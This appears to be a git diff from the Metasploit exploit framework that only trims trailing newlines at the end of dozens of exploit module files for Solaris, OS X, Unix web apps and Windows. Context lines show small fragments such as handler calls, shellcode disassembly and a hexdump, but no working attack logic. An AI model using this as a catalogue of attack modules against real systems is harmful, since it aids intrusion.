a/modules/exploits/netware/smb/lsass_cifs.rb b/modules/exploits/netware/smb/lsass_cifs.rb index 95456b228b..fd1dba7ea5 100644 --- a/modules/exploits/netware/smb/lsass_cifs.rb +++ b/modules/exploits/netware/smb/lsass_cifs.rb @@ -124,5 +124,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/osx/afp/loginext.rb b/modules/exploits/osx/afp/loginext.rb index 2ebf2242cc..d651275f0a 100644 --- a/modules/exploits/osx/afp/loginext.rb +++ b/modules/exploits/osx/afp/loginext.rb @@ -108,6 +108,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - - +end \ No newline at end of file diff --git a/modules/exploits/osx/arkeia/type77.rb b/modules/exploits/osx/arkeia/type77.rb index 7887e95fc3..b24010bbac 100644 --- a/modules/exploits/osx/arkeia/type77.rb +++ b/modules/exploits/osx/arkeia/type77.rb @@ -118,5 +118,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/osx/armle/safari_libtiff.rb b/modules/exploits/osx/armle/safari_libtiff.rb index be1268b354..a26e0a86e1 100644 --- a/modules/exploits/osx/armle/safari_libtiff.rb +++ b/modules/exploits/osx/armle/safari_libtiff.rb @@ -173,5 +173,4 @@ class Metasploit3 < Msf::Exploit::Remote tiff << hehe end -end - +end \ No newline at end of file diff --git a/modules/exploits/osx/browser/safari_libtiff.rb b/modules/exploits/osx/browser/safari_libtiff.rb index 0060f6d59b..e9e830f500 100644 --- a/modules/exploits/osx/browser/safari_libtiff.rb +++ b/modules/exploits/osx/browser/safari_libtiff.rb @@ -161,5 +161,4 @@ class Metasploit3 < Msf::Exploit::Remote tiff << hehe end -end - +end \ No newline at end of file diff --git a/modules/exploits/osx/browser/safari_metadata_archive.rb b/modules/exploits/osx/browser/safari_metadata_archive.rb index 4445514a56..c3761ca161 100644 --- a/modules/exploits/osx/browser/safari_metadata_archive.rb +++ b/modules/exploits/osx/browser/safari_metadata_archive.rb @@ -199,5 +199,4 @@ class Metasploit3 < Msf::Exploit::Remote "\x00\x00\xff\xff\x00\x00\x00\x00\x01\x0d\x21\x7c" end -end - +end \ No newline at end of file diff --git a/modules/exploits/osx/browser/software_update.rb b/modules/exploits/osx/browser/software_update.rb index b818276858..f5b49ae27f 100644 --- a/modules/exploits/osx/browser/software_update.rb +++ b/modules/exploits/osx/browser/software_update.rb @@ -147,5 +147,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/osx/email/mailapp_image_exec.rb b/modules/exploits/osx/email/mailapp_image_exec.rb index a794823be6..c9529fa23f 100644 --- a/modules/exploits/osx/email/mailapp_image_exec.rb +++ b/modules/exploits/osx/email/mailapp_image_exec.rb @@ -167,6 +167,4 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Waiting for a payload session (backgrounding)...") end -end - - +end \ No newline at end of file diff --git a/modules/exploits/osx/email/mobilemail_libtiff.rb b/modules/exploits/osx/email/mobilemail_libtiff.rb index 430f2ecdde..b2851763d5 100644 --- a/modules/exploits/osx/email/mobilemail_libtiff.rb +++ b/modules/exploits/osx/email/mobilemail_libtiff.rb @@ -179,6 +179,4 @@ class Metasploit3 < Msf::Exploit::Remote tiff << hehe end -end - - +end \ No newline at end of file diff --git a/modules/exploits/osx/ftp/webstar_ftp_user.rb b/modules/exploits/osx/ftp/webstar_ftp_user.rb index 558569fbb6..81d3a169a9 100644 --- a/modules/exploits/osx/ftp/webstar_ftp_user.rb +++ b/modules/exploits/osx/ftp/webstar_ftp_user.rb @@ -109,5 +109,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/osx/samba/lsa_transnames_heap.rb b/modules/exploits/osx/samba/lsa_transnames_heap.rb index f7a7e8508c..c3ddb00dc6 100644 --- a/modules/exploits/osx/samba/lsa_transnames_heap.rb +++ b/modules/exploits/osx/samba/lsa_transnames_heap.rb @@ -343,5 +343,4 @@ class Metasploit3 < Msf::Exploit::Remote dcerpc.last_response.stub_data[0,20] end -end - +end \ No newline at end of file diff --git a/modules/exploits/osx/samba/trans2open.rb b/modules/exploits/osx/samba/trans2open.rb index 82be9fe788..d4e4609795 100644 --- a/modules/exploits/osx/samba/trans2open.rb +++ b/modules/exploits/osx/samba/trans2open.rb @@ -106,5 +106,4 @@ class Metasploit3 < Msf::Exploit::Remote curr_ret -= target['Rets'][2] end end -end - +end \ No newline at end of file diff --git a/modules/exploits/solaris/dtspcd/heap_noir.rb b/modules/exploits/solaris/dtspcd/heap_noir.rb index ecd298d880..21d2a3eb05 100644 --- a/modules/exploits/solaris/dtspcd/heap_noir.rb +++ b/modules/exploits/solaris/dtspcd/heap_noir.rb @@ -164,5 +164,4 @@ class Metasploit3 < Msf::Exploit::Remote @spc_seq = 0 end -end - +end \ No newline at end of file diff --git a/modules/exploits/solaris/lpd/sendmail_exec.rb b/modules/exploits/solaris/lpd/sendmail_exec.rb index 92b2cac352..df1e886a20 100644 --- a/modules/exploits/solaris/lpd/sendmail_exec.rb +++ b/modules/exploits/solaris/lpd/sendmail_exec.rb @@ -173,5 +173,4 @@ class Metasploit3 < Msf::Exploit::Remote return true end -end - +end \ No newline at end of file diff --git a/modules/exploits/solaris/samba/lsa_transnames_heap.rb b/modules/exploits/solaris/samba/lsa_transnames_heap.rb index 8d23a8c6be..5a008c4721 100644 --- a/modules/exploits/solaris/samba/lsa_transnames_heap.rb +++ b/modules/exploits/solaris/samba/lsa_transnames_heap.rb @@ -213,5 +213,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - +end \ No newline at end of file diff --git a/modules/exploits/solaris/samba/trans2open.rb b/modules/exploits/solaris/samba/trans2open.rb index 4021194fa7..19e4a8ef34 100644 --- a/modules/exploits/solaris/samba/trans2open.rb +++ b/modules/exploits/solaris/samba/trans2open.rb @@ -151,5 +151,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end - +end \ No newline at end of file diff --git a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb index 13dd42dffb..52529e3df6 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb @@ -164,4 +164,4 @@ class Metasploit3 < Msf::Exploit::Remote XDR.encode(str, 3, 4, int, 0, 0) end -end +end \ No newline at end of file diff --git a/modules/exploits/solaris/sunrpc/sadmind_exec.rb b/modules/exploits/solaris/sunrpc/sadmind_exec.rb index ecec53ddcc..45812edcb2 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_exec.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_exec.rb @@ -136,5 +136,4 @@ class Metasploit3 < Msf::Exploit::Remote def do_int(str, int) XDR.encode(str, 3, 4, int, 0, 0) end -end - +end \ No newline at end of file diff --git a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb index 62371f6eb0..6373b14813 100644 --- a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb +++ b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb @@ -73,5 +73,4 @@ class Metasploit3 < Msf::Exploit::Remote print_status 'Exploit may or may not have succeeded.' end -end - +end \ No newline at end of file diff --git a/modules/exploits/solaris/telnet/fuser.rb b/modules/exploits/solaris/telnet/fuser.rb index 9d21b39bba..27f743e580 100644 --- a/modules/exploits/solaris/telnet/fuser.rb +++ b/modules/exploits/solaris/telnet/fuser.rb @@ -105,5 +105,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/modules/exploits/solaris/telnet/ttyprompt.rb b/modules/exploits/solaris/telnet/ttyprompt.rb index a144b69071..5e369af833 100644 --- a/modules/exploits/solaris/telnet/ttyprompt.rb +++ b/modules/exploits/solaris/telnet/ttyprompt.rb @@ -104,5 +104,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/modules/exploits/test/aggressive.rb b/modules/exploits/test/aggressive.rb index 688197e691..f1ff8feb05 100644 --- a/modules/exploits/test/aggressive.rb +++ b/modules/exploits/test/aggressive.rb @@ -110,8 +110,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - - - - +end \ No newline at end of file diff --git a/modules/exploits/test/exploitme.rb b/modules/exploits/test/exploitme.rb index b55e1fa307..2b1ba2fc1e 100644 --- a/modules/exploits/test/exploitme.rb +++ b/modules/exploits/test/exploitme.rb @@ -128,8 +128,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - - - - +end \ No newline at end of file diff --git a/modules/exploits/test/kernel.rb b/modules/exploits/test/kernel.rb index 6c50cb068b..551e15943b 100644 --- a/modules/exploits/test/kernel.rb +++ b/modules/exploits/test/kernel.rb @@ -82,8 +82,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end - - - - +end \ No newline at end of file diff --git a/modules/exploits/unix/misc/distcc_exec.rb b/modules/exploits/unix/misc/distcc_exec.rb index fc960a3b6b..26a73ddc31 100644 --- a/modules/exploits/unix/misc/distcc_exec.rb +++ b/modules/exploits/unix/misc/distcc_exec.rb @@ -117,5 +117,4 @@ class Metasploit3 < Msf::Exploit::Remote return res end -end - +end \ No newline at end of file diff --git a/modules/exploits/unix/misc/openview_omniback_exec.rb b/modules/exploits/unix/misc/openview_omniback_exec.rb index 3fdc359ff8..b8fe2e3f31 100644 --- a/modules/exploits/unix/misc/openview_omniback_exec.rb +++ b/modules/exploits/unix/misc/openview_omniback_exec.rb @@ -124,5 +124,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/unix/misc/spamassassin_exec.rb b/modules/exploits/unix/misc/spamassassin_exec.rb index 782ee8012d..e8048dca3a 100644 --- a/modules/exploits/unix/misc/spamassassin_exec.rb +++ b/modules/exploits/unix/misc/spamassassin_exec.rb @@ -71,5 +71,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb index 423c2a356a..e151df6e44 100644 --- a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb +++ b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb @@ -91,5 +91,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/unix/webapp/awstats_configdir_exec.rb b/modules/exploits/unix/webapp/awstats_configdir_exec.rb index 0cf9c7d47f..61b4d61100 100644 --- a/modules/exploits/unix/webapp/awstats_configdir_exec.rb +++ b/modules/exploits/unix/webapp/awstats_configdir_exec.rb @@ -100,6 +100,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end - - +end \ No newline at end of file diff --git a/modules/exploits/unix/webapp/barracuda_img_exec.rb b/modules/exploits/unix/webapp/barracuda_img_exec.rb index ca66a74e13..58c952734e 100644 --- a/modules/exploits/unix/webapp/barracuda_img_exec.rb +++ b/modules/exploits/unix/webapp/barracuda_img_exec.rb @@ -98,5 +98,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end - +end \ No newline at end of file diff --git a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb index 47aac883c3..d8b3ec85c4 100644 --- a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb +++ b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb @@ -101,5 +101,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end - +end \ No newline at end of file diff --git a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb index dca90a8533..e46f6def0d 100644 --- a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb +++ b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb @@ -141,5 +141,4 @@ class Metasploit3 < Msf::Exploit::Remote stop_service end -end - +end \ No newline at end of file diff --git a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb index 4f88dbc1e9..e3549ae0d3 100644 --- a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb +++ b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb @@ -77,5 +77,4 @@ class Metasploit3 < Msf::Exploit::Remote }, 25) end -end - +end \ No newline at end of file diff --git a/modules/exploits/unix/webapp/openview_connectednodes_exec.rb b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb index cb15e4ee9a..875a8b63a7 100644 --- a/modules/exploits/unix/webapp/openview_connectednodes_exec.rb +++ b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb @@ -82,5 +82,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end - +end \ No newline at end of file diff --git a/modules/exploits/unix/webapp/pajax_remote_exec.rb b/modules/exploits/unix/webapp/pajax_remote_exec.rb index 62db3fcaed..d0944a04a3 100644 --- a/modules/exploits/unix/webapp/pajax_remote_exec.rb +++ b/modules/exploits/unix/webapp/pajax_remote_exec.rb @@ -80,5 +80,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end - +end \ No newline at end of file diff --git a/modules/exploits/unix/webapp/php_eval.rb b/modules/exploits/unix/webapp/php_eval.rb index 11745969f5..8b2b449b52 100644 --- a/modules/exploits/unix/webapp/php_eval.rb +++ b/modules/exploits/unix/webapp/php_eval.rb @@ -65,4 +65,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/modules/exploits/unix/webapp/php_include.rb b/modules/exploits/unix/webapp/php_include.rb index 0518c5168b..c59891cae0 100644 --- a/modules/exploits/unix/webapp/php_include.rb +++ b/modules/exploits/unix/webapp/php_include.rb @@ -65,5 +65,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/modules/exploits/unix/webapp/php_vbulletin_template.rb b/modules/exploits/unix/webapp/php_vbulletin_template.rb index ded1c89aea..d7260fd3e6 100644 --- a/modules/exploits/unix/webapp/php_vbulletin_template.rb +++ b/modules/exploits/unix/webapp/php_vbulletin_template.rb @@ -113,5 +113,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end end -end - +end \ No newline at end of file diff --git a/modules/exploits/unix/webapp/php_wordpress_lastpost.rb b/modules/exploits/unix/webapp/php_wordpress_lastpost.rb index 46fadb319b..04020b6ad1 100644 --- a/modules/exploits/unix/webapp/php_wordpress_lastpost.rb +++ b/modules/exploits/unix/webapp/php_wordpress_lastpost.rb @@ -84,5 +84,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end - +end \ No newline at end of file diff --git a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb index 0c3760d83d..596b8b8aba 100644 --- a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb +++ b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb @@ -123,5 +123,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end end -end - +end \ No newline at end of file diff --git a/modules/exploits/unix/webapp/phpbb_highlight.rb b/modules/exploits/unix/webapp/phpbb_highlight.rb index 7ab7a56063..7181dd1544 100644 --- a/modules/exploits/unix/webapp/phpbb_highlight.rb +++ b/modules/exploits/unix/webapp/phpbb_highlight.rb @@ -124,7 +124,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - - - +end \ No newline at end of file diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb index d36c24b383..0413b88c6c 100644 --- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb +++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb @@ -239,5 +239,4 @@ class Metasploit3 < Msf::Exploit::Remote cmd_shell(cmdpath) delete_file(cmdpath) end -end - +end \ No newline at end of file diff --git a/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb b/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb index 739790c7e4..4e83ef3b53 100644 --- a/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb +++ b/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb @@ -113,8 +113,4 @@ class Metasploit3 < Msf::Exploit::Remote send_message(msg.to_s) print_status("Waiting for a payload session (backgrounding)...") - end - - - - + end \ No newline at end of file diff --git a/modules/exploits/windows/antivirus/symantec_rtvscan.rb b/modules/exploits/windows/antivirus/symantec_rtvscan.rb index 3db015c318..4f1738c06b 100644 --- a/modules/exploits/windows/antivirus/symantec_rtvscan.rb +++ b/modules/exploits/windows/antivirus/symantec_rtvscan.rb @@ -97,5 +97,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb index 6d5222d72c..4e31e9d8a3 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb @@ -81,5 +81,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb index 5a9c12bdf0..796c9d5714 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb @@ -82,5 +82,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb index f0ae5087f8..791b2d592d 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb @@ -81,5 +81,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/arkeia/type77.rb b/modules/exploits/windows/arkeia/type77.rb index b94bfee7c3..af6ae2596e 100644 --- a/modules/exploits/windows/arkeia/type77.rb +++ b/modules/exploits/windows/arkeia/type77.rb @@ -125,5 +125,4 @@ class Metasploit3 < Msf::Exploit::Remote data[ 96, seh.length] = seh end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/backupexec/name_service.rb b/modules/exploits/windows/backupexec/name_service.rb index 9ba6504fd8..b1e276469b 100644 --- a/modules/exploits/windows/backupexec/name_service.rb +++ b/modules/exploits/windows/backupexec/name_service.rb @@ -147,4 +147,4 @@ __END__ 0000002C 4E dec esi 0000002D 85F6 test esi,esi 0000002F 75E1 jnz 0x12 -00000031 FFD7 call edi +00000031 FFD7 call edi \ No newline at end of file diff --git a/modules/exploits/windows/backupexec/remote_agent.rb b/modules/exploits/windows/backupexec/remote_agent.rb index 1ce587908b..6f457b55d7 100644 --- a/modules/exploits/windows/backupexec/remote_agent.rb +++ b/modules/exploits/windows/backupexec/remote_agent.rb @@ -135,5 +135,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/brightstor/discovery_tcp.rb b/modules/exploits/windows/brightstor/discovery_tcp.rb index baaacb0fe6..fa6eae81a0 100644 --- a/modules/exploits/windows/brightstor/discovery_tcp.rb +++ b/modules/exploits/windows/brightstor/discovery_tcp.rb @@ -138,5 +138,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/brightstor/discovery_udp.rb b/modules/exploits/windows/brightstor/discovery_udp.rb index 722930b2c2..a650e76e23 100644 --- a/modules/exploits/windows/brightstor/discovery_udp.rb +++ b/modules/exploits/windows/brightstor/discovery_udp.rb @@ -132,5 +132,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/brightstor/etrust_itm_alert.rb b/modules/exploits/windows/brightstor/etrust_itm_alert.rb index a83d52c208..69703a6bef 100644 --- a/modules/exploits/windows/brightstor/etrust_itm_alert.rb +++ b/modules/exploits/windows/brightstor/etrust_itm_alert.rb @@ -129,4 +129,4 @@ long sub_401000 ( ); } -=end +=end \ No newline at end of file diff --git a/modules/exploits/windows/brightstor/hsmserver.rb b/modules/exploits/windows/brightstor/hsmserver.rb index 33fd6180d6..cd5e6d2b74 100644 --- a/modules/exploits/windows/brightstor/hsmserver.rb +++ b/modules/exploits/windows/brightstor/hsmserver.rb @@ -73,5 +73,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/brightstor/lgserver.rb b/modules/exploits/windows/brightstor/lgserver.rb index 81580af877..7413238c43 100644 --- a/modules/exploits/windows/brightstor/lgserver.rb +++ b/modules/exploits/windows/brightstor/lgserver.rb @@ -69,5 +69,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb index 7111083d68..6da7ce25a1 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb @@ -89,5 +89,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb index 9df3f04da3..72c6ffa9b0 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb @@ -90,5 +90,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb index e56f9c59f8..b586f6f896 100644 --- a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb +++ b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb @@ -276,5 +276,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/brightstor/message_engine.rb b/modules/exploits/windows/brightstor/message_engine.rb index cc98c10e20..b3c6a21440 100644 --- a/modules/exploits/windows/brightstor/message_engine.rb +++ b/modules/exploits/windows/brightstor/message_engine.rb @@ -82,5 +82,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/brightstor/message_engine_heap.rb b/modules/exploits/windows/brightstor/message_engine_heap.rb index 5fa1f304e2..b3724ca31c 100644 --- a/modules/exploits/windows/brightstor/message_engine_heap.rb +++ b/modules/exploits/windows/brightstor/message_engine_heap.rb @@ -80,5 +80,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/brightstor/sql_agent.rb b/modules/exploits/windows/brightstor/sql_agent.rb index 9c6091fa20..2e7d52f053 100644 --- a/modules/exploits/windows/brightstor/sql_agent.rb +++ b/modules/exploits/windows/brightstor/sql_agent.rb @@ -110,5 +110,4 @@ class Metasploit3 < Msf::Exploit::Remote } end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/brightstor/tape_engine.rb b/modules/exploits/windows/brightstor/tape_engine.rb index 8d66e01cec..f4dede9d93 100644 --- a/modules/exploits/windows/brightstor/tape_engine.rb +++ b/modules/exploits/windows/brightstor/tape_engine.rb @@ -89,5 +89,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/brightstor/universal_agent.rb b/modules/exploits/windows/brightstor/universal_agent.rb index d4e8e7d6b7..06ab6f2998 100644 --- a/modules/exploits/windows/brightstor/universal_agent.rb +++ b/modules/exploits/windows/brightstor/universal_agent.rb @@ -155,4 +155,4 @@ and run it through again. Only tested on WinXP SP1 016c5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b......... 016d5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b......... 01725c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b......... -017e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b......... +017e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b......... \ No newline at end of file diff --git a/modules/exploits/windows/browser/aim_goaway.rb b/modules/exploits/windows/browser/aim_goaway.rb index e54c657bcf..d11fbbe2dc 100644 --- a/modules/exploits/windows/browser/aim_goaway.rb +++ b/modules/exploits/windows/browser/aim_goaway.rb @@ -93,6 +93,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/ani_loadimage_chunksize.rb b/modules/exploits/windows/browser/ani_loadimage_chunksize.rb index cc76ad2f45..a7c2b61900 100644 --- a/modules/exploits/windows/browser/ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/browser/ani_loadimage_chunksize.rb @@ -579,5 +579,4 @@ include Msf::Exploit::Remote::HttpServer::HTML return tag end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/apple_itunes_playlist.rb b/modules/exploits/windows/browser/apple_itunes_playlist.rb index 873732f914..df455098ac 100644 --- a/modules/exploits/windows/browser/apple_itunes_playlist.rb +++ b/modules/exploits/windows/browser/apple_itunes_playlist.rb @@ -79,5 +79,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb index f42043dc22..04fdd60181 100644 --- a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb +++ b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb @@ -73,5 +73,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(client) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/ask_shortformat.rb b/modules/exploits/windows/browser/ask_shortformat.rb index 616a28ea50..b7fbdf6807 100644 --- a/modules/exploits/windows/browser/ask_shortformat.rb +++ b/modules/exploits/windows/browser/ask_shortformat.rb @@ -93,5 +93,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/bearshare_setformatlikesample.rb b/modules/exploits/windows/browser/bearshare_setformatlikesample.rb index a0b8dcfeac..5d3a356477 100644 --- a/modules/exploits/windows/browser/bearshare_setformatlikesample.rb +++ b/modules/exploits/windows/browser/bearshare_setformatlikesample.rb @@ -85,5 +85,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/creative_software_cachefolder.rb b/modules/exploits/windows/browser/creative_software_cachefolder.rb index 06e8db36e5..8dc454285b 100644 --- a/modules/exploits/windows/browser/creative_software_cachefolder.rb +++ b/modules/exploits/windows/browser/creative_software_cachefolder.rb @@ -110,6 +110,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb index d1c79ce46c..eae0cc616e 100644 --- a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb +++ b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb @@ -94,5 +94,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/facebook_extractiptc.rb b/modules/exploits/windows/browser/facebook_extractiptc.rb index afbc59ab2f..116c710210 100644 --- a/modules/exploits/windows/browser/facebook_extractiptc.rb +++ b/modules/exploits/windows/browser/facebook_extractiptc.rb @@ -103,5 +103,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/gom_openurl.rb b/modules/exploits/windows/browser/gom_openurl.rb index 752f3f58b4..35c6dd8285 100644 --- a/modules/exploits/windows/browser/gom_openurl.rb +++ b/modules/exploits/windows/browser/gom_openurl.rb @@ -92,5 +92,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/hploadrunner.rb b/modules/exploits/windows/browser/hploadrunner.rb index 03455d30bb..6260c65191 100644 --- a/modules/exploits/windows/browser/hploadrunner.rb +++ b/modules/exploits/windows/browser/hploadrunner.rb @@ -92,5 +92,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/hpmqc_progcolor.rb b/modules/exploits/windows/browser/hpmqc_progcolor.rb index 8174ed3358..828219e9d3 100644 --- a/modules/exploits/windows/browser/hpmqc_progcolor.rb +++ b/modules/exploits/windows/browser/hpmqc_progcolor.rb @@ -118,5 +118,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb 